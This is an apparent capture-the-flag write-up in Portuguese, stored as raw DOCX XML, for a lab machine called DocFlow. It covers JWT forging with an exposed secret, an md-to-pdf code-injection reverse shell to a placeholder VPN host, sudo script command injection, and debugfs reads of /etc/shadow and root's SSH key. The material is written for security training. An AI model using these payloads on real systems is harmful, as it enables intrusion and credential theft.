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roa6wfjnhhmq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p9fi6dfurdi0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DocFlow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2gsi7a5siyw0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Iniciamos o processo de enumeração da aplicação utilizando o Nmap para identificar hosts ativos, portas abertas e serviços expostos.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51100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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a varredura, identificamos que a aplicação possui duas portas expostas: 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 (HTTP)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 (SSH)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Ao acessar a aplicação por meio da porta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80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(HTTP), foi possível analisar a interface web.</w:t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03788"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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7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Utilizando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ffuf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realizar brute force de diretórios e arquivos, foi possível identificar a presença do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package.json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na aplicação.</w:t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http://&lt;machine-ip&gt;/FUZZ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common.txt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75188"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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1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conteúdo do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package.json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revelou as versões das bibliotecas instaladas no servidor, permitindo avaliar potenciais vulnerabilidades associadas às dependências utilizadas.</w:t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734050" cy="4700000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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00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identificado que a biblioteca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md-to-pdf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utilizada pela aplicação possui uma vulnerabilidade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Arbitrary Code Injection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afetando versões anteriores à 5.2.5, conforme descrito na respectiva</w:t>
      </w:r>
      <w:hyperlink r:id="rId13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 CVE-2025-065108.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Contudo, ao interagir com a aplicação, verificou-se que a funcionalidade associada a essa biblioteca não está acessível pela interface disponível ao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usuário neste momento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Criamos um usuário e senha na aplicação web para continuar a análise da página.</w:t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39424"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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2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aplicação, observou-se que o uso dessa funcionalidade é restrito a contas do tipo premium, não estando disponível para usuários comuns.</w:t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70819"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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1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criação do usuário, também foi gerado um token JWT.</w:t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03300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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inspecionar a aplicação por meio das ferramentas de desenvolvedor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(F12)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especificamente na aba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Debugger,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possível identificar que o aplicativo utiliza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Webpack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seu processo.</w:t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Considerando que a aplicação utiliza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Webpack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 conforme identificado  e que a opção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sourceMap encontra-se habilitada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é possível acessar e visualizar todos os arquivos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front-end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 aplicação.</w:t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54200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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01800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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essa opção habilitada, foi possível tanto identificar as rotas utilizadas pela aplicação quanto obter o token de assinatura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JWT exposto nos arquivos do front-end.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token-jwt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eva6C7G4LTdY!p@yMMxb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79600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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senha do token JWT em mãos, foi possível alterar seus atributos, modificando a permissão do usuário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is_premium: false para true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Para gerar o token JWT, utilizamos a ferramenta </w:t>
      </w:r>
      <w:hyperlink r:id="rId20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jwt.io.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451463"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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4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forma, foi possível acessar a conta premium da aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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38587"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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58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Além disso, explorando a vulnerabilidade previamente identificada na biblioteca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md-to-pdf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demonstrar a execução arbitrária de comandos no servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042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((require("child_process")).execSync("/bin/bash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/dev/tcp/&lt;ip-vpn&gt;/443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0&gt;&amp;1'"))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108307"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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30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Abrimos um servidor na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443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aguardar a reverse shell e, após a conexão, obtivemos acesso como usuário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  <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> www-data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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25600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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4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realizamos a obtenção de um shell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TTY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interativo para melhorar a estabilidade e usabilidade da sessão.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051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ctr+z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-echo;fg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762625" cy="2143125"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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431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comando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sudo -l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verificamos que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www-data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possui permissão para executar o arquivo localizado em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/opt/check.sh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como o usuário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  <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> axel,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sem necessidade de senha.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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22400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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identificado que o script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check.sh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realiza a leitura de um valor fornecido pelo usuário e armazena esse dado na variável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num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Em seguida, essa variável é utilizada diretamente em uma instrução condicional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(if)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sem qualquer validação ou sanitização prévia.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Essa ausência de tratamento adequado permite que valores inesperados sejam inseridos na variável, possibilitando que comandos arbitrários sejam interpretados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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438775" cy="2657475"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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6574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Desta forma, conseguimos injetar comandos, como confirmado pelo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comando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whoami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a[$(whoami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&gt;&amp;2)]+42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8363" cy="1239242"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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363" cy="123924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isso, basta chamar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bash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executar comandos como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  <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">axel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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a[$(bash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&gt;&amp;2)]+42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81100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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root se encontra em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/home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axel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89000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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heading=h.by2ys9argo18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Executando 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  <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id,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identificamos que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axe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l pertence ao grupo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  <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">disk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 que lhe permite ler e escrever arquivos no sistema com privilégios elevados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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76300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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Utilizando o comando lsblk, identificamos que o sistema está montado na partição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nvme0n1p1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lsblk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98863"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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88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ferramenta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debugfs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permite interação de baixo nível com sistemas de arquivos, conseguimos ler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/etc/shadow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acessando a partição identificada anteriormente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(nvme0n1p1).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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debugfs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/dev/nvme0n1p1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5032613"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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581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26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Conseguimos acessar a chave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id_rsa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usuário root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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489688"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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96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Conseguimos acessar a chave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id_rsa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do usuário root e, com isso, obter acesso à conta root via SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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root@&lt;machine-ip&gt;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413488"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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4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root se encontra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/root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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44600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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headerReference r:id="rId37" w:type="default"/>
      <w:headerReference r:id="rId38" w:type="first"/>
      <w:headerReference r:id="rId39" w:type="even"/>
      <w:footerReference r:id="rId40" w:type="default"/>
      <w:footerReference r:id="rId41" w:type="first"/>
      <w:footerReference r:id="rId42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E">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.3wyqxkhzvp1m" w:id="4"/>
    <w:bookmarkEnd w:id="4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63" name="image30.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image30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F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65" name="image26.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image26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3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DocFlow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37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61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1.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://jwt.io" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24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25.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20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7.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/laboratory/competition-machines/303#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15.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-14089788" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6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0.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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9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jkezNO25Yb+UMs/OuP4TZ/joiQ==">CgMxLjAyDmgucm9hNndmam5oaG1xMg5oLnA5Zmk2ZGZ1cmRpMDIOaC4yZ3NpN2E1c2l5dzAyDmguYnkyeXM5YXJnbzE4Mg5oLjN3eXF4a2h6dnAxbTgAciExQkN1bElGTVRhYkdjYWVmTXRyRFhpSlRyaF9WUnZ4eVA=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